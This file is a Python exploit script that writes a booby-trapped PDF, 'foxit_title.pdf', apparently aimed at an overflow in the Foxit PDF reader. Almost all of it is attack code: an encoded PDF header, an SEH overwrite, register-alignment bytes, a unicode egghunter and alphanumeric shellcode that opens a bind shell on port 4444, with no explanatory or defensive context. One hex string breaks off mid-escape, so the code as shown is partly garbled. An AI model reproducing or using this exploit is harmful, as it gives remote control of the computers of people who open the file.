#!/usr/bin/python
 
preamble = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0A\x25\xE2\xE3\xCF\xD3\x0A\x38\x31\x20\x30\x20\x6F\x62\x6A\x0A\x3C\x3C\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20\x31\x2F\x4C\x20\x32\x31\x33\x37\x35\x36\x2F\x4F\x20\x38\x33\x2F\x45\x20\x31\x34\x31\x36\x33\x31\x2F\x4E\x20\x32\x31\x2F\x54\x20\x32\x31\x32\x30\x38\x39\x2F\x48\x20\x5B\x20\x31\x32\x31\x36\x20\x36\x39\x39\x5D\x3E\x3E\x0A\x65\x6E\x64\x6F\x62\x6A\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0A\x78\x72\x65\x66\x0A\x38\x31\x20\x34\x36\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x31\x39\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x32\x30\x38\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x32\x33\x31\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x32\x33\x36\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x32\x34\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x32\x33\x37\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x32\x33\x39\x35\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x32\x34\x35\x30\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x32\x34\x38\x38\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x34\x38\x36\x38\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x34\x38\x38\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x34\x39\x34\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x34\x39\x39\x34\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x30\x34\x38\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x30\x39\x33\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x31\x33\x37\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x31\x38\x33\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x32\x32\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x32\x38\x35\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x33\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x35\x33\x35\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x32\x36\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x32\x38\x35\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x33\x34\x30\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x33\x37\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x35\x32\x32\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x35\x34\x31\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x35\x37\x30\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x35\x38\x36\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x36\x30\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x36\x35\x36\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x37\x36\x39\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x39\x32\x31\x35\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x39\x32\x33\x34\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x39\x33\x30\x31\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x39\x33\x35\x32\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x30\x36\x33\x37\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x30\x36\x35\x36\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x30\x37\x31\x38\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x30\x37\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x31\x39\x35\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x31\x39\x37\x38\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x32\x30\x33\x30\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x31\x32\x30\x36\x37\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x30\x30\x30\x30\x30\x30\x31\x32\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0A\x74\x72\x61\x69\x6C\x65\x72\x0A\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x31\x32\x37\x2F\x50\x7
 
# 202 byte unicode egghunter - EAX base register
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9W4K7WKO9WKPA")
 
# Bindshell port 4444 - Does not need to be Unicode friendly. Simple Alpha will do. - 745 bytes
 
bindshell = ("\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x4b\x58\x4b\x39\x45\x50\x45\x50\x45\x50\x43\x50\x4c\x49"
"\x4a\x45\x46\x51\x4e\x32\x45\x34\x4c\x4b\x51\x42\x46\x50\x4c"
"\x4b\x46\x32\x44\x4c\x4c\x4b\x50\x52\x42\x34\x4c\x4b\x42\x52"
"\x47\x58\x44\x4f\x4e\x57\x50\x4a\x46\x46\x46\x51\x4b\x4f\x50"
"\x31\x4f\x30\x4e\x4c\x47\x4c\x45\x31\x43\x4c\x44\x42\x46\x4c"
"\x51\x30\x49\x51\x48\x4f\x44\x4d\x45\x51\x49\x57\x4b\x52\x4a"
"\x50\x50\x52\x50\x57\x4c\x4b\x50\x52\x44\x50\x4c\x4b\x50\x42"
"\x47\x4c\x45\x51\x4e\x30\x4c\x4b\x51\x50\x42\x58\x4b\x35\x49"
"\x50\x43\x44\x50\x4a\x43\x31\x4e\x30\x46\x30\x4c\x4b\x47\x38"
"\x45\x48\x4c\x4b\x51\x48\x47\x50\x45\x51\x4e\x33\x4d\x33\x47"
"\x4c\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x43\x31\x4e\x36\x50\x31"
"\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x4f\x31\x48\x4f\x44\x4d\x43"
"\x31\x49\x57\x50\x38\x4b\x50\x44\x35\x4c\x34\x44\x43\x43\x4d"
"\x4c\x38\x47\x4b\x43\x4d\x51\x34\x42\x55\x4a\x42\x51\x48\x4c"
"\x4b\x46\x38\x47\x54\x45\x51\x48\x53\x45\x36\x4c\x4b\x44\x4c"
"\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x43\x31\x49\x43\x4c\x4b\x43"
"\x34\x4c\x4b\x43\x31\x4e\x30\x4c\x49\x47\x34\x51\x34\x47\x54"
"\x51\x4b\x51\x4b\x43\x51\x50\x59\x51\x4a\x46\x31\x4b\x4f\x4b"
"\x50\x51\x48\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x4a\x4b\x4d\x56"
"\x51\x4d\x43\x58\x47\x43\x47\x42\x43\x30\x43\x30\x42\x48\x44"
"\x37\x44\x33\x50\x32\x51\x4f\x51\x44\x45\x38\x50\x4c\x43\x47"
"\x47\x56\x44\x47\x4b\x4f\x48\x55\x48\x38\x4c\x50\x43\x31\x45"
"\x50\x43\x30\x51\x39\x48\x44\x50\x54\x50\x50\x42\x48\x46\x49"
"\x4d\x50\x42\x4b\x45\x50\x4b\x4f\x4e\x35\x50\x50\x50\x50\x46"
"\x30\x46\x30\x51\x50\x50\x50\x47\x30\x50\x50\x43\x58\x4a\x4a"
"\x44\x4f\x49\x4f\x4b\x50\x4b\x4f\x49\x45\x4c\x49\x49\x57\x46"
"\x51\x49\x4b\x46\x33\x43\x58\x45\x52\x43\x30\x44\x51\x51\x4c"
"\x4c\x49\x4a\x46\x42\x4a\x44\x50\x50\x56\x46\x37\x45\x38\x4f"
"\x32\x49\x4b\x47\x47\x45\x37\x4b\x4f\x4e\x35\x51\x43\x46\x37"
"\x45\x38\x4f\x47\x4b\x59\x46\x58\x4b\x4f\x4b\x4f\x4e\x35\x50"
"\x53\x51\x43\x51\x47\x45\x38\x44\x34\x4a\x4c\x47\x4b\x4b\x51"
"\x4b\x4f\x48\x55\x51\x47\x4b\x39\x48\x47\x42\x48\x43\x45\x42"
"\x4e\x50\x4d\x43\x51\x4b\x4f\x49\x45\x42\x48\x43\x53\x42\x4d"
"\x42\x44\x45\x50\x4c\x49\x4d\x33\x50\x57\x50\x57\x46\x37\x50"
"\x31\x4a\x56\x42\x4a\x42\x32\x51\x49\x46\x36\x4a\x42\x4b\x4d"
"\x42\x46\x49\x57\x47\x34\x51\x34\x47\x4c\x45\x51\x43\x31\x4c"
"\x4d\x50\x44\x51\x34\x42\x30\x4f\x36\x43\x30\x47\x34\x50\x54"
"\x46\x30\x46\x36\x51\x46\x51\x46\x50\x46\x46\x36\x50\x4e\x51"
"\x46\x50\x56\x50\x53\x50\x56\x43\x58\x44\x39\x48\x4c\x47\x4f"
"\x4d\x56\x4b\x4f\x4e\x35\x4b\x39\x4b\x50\x50\x4e\x50\x56\x51"
"\x56\x4b\x4f\x46\x50\x45\x38\x45\x58\x4c\x47\x45\x4d\x45\x30"
"\x4b\x4f\x4e\x35\x4f\x4b\x4a\x50\x4e\x55\x4e\x42\x46\x36\x42"
"\x48\x49\x36\x4a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x48\x55\x47\x4c"
"\x43\x36\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4b\x50\x43\x45\x43"
"\x35\x4f\x4b\x47\x37\x44\x53\x42\x52\x42\x4f\x42\x4a\x45\x50"
"\x51\x43\x4b\x4f\x4e\x35\x44\x4a\x41\x41")
 
lead = "\x41" * 538
nseh = "\x41\x6d" # Walk over SEH
seh = "\x2F\x4D"  # p/p/r from app binary
 
l33tmath = "\x41"
l33tmath += "\x6D"          # Align
l33tmath += "\x58"          # POP EAX
l33tmath += "\x6D"          # Align
l33tmath += "\x58"          # POP EAX
l33tmath += "\x6D"          # Align
l33tmath += "\x58"          # POP EAX
l33tmath += "\x6D"          # Align
l33tmath += "\x35\xFF\x01"  # XOR EAX,2000FF00
l33tmath += "\x6D"          # Align
l33tmath += "\x35\xF0\x01"  # XOR EAX,2000F000
l33tmath += "\x6D"          # Align
l33tmath += "\x50"          # PUSH EAX
l33tmath += "\x6D"          # Align
l33tmath += "\xC3"          # RETN
l33tmath += "\x6D"          # Align
 
filler = "\x41" * 104
egg = "w00tw00t"
trailer = "\x44" * 8507
trailer += "\xE7\xE7"
trailer += "dookie was here: breaking your pdf reader application"
trailer += "\x29\x3E\x3E\x0A\x65\x6E\x64\x6F\x62\x6A"
 
sploit = preamble + lead + nseh + seh + l33tmath + filler + egghunter + filler + egg + bindshell + trailer
 
filename = "foxit_title.pdf"
evil = open(filename, 'w')
evil.write(sploit)
evil.close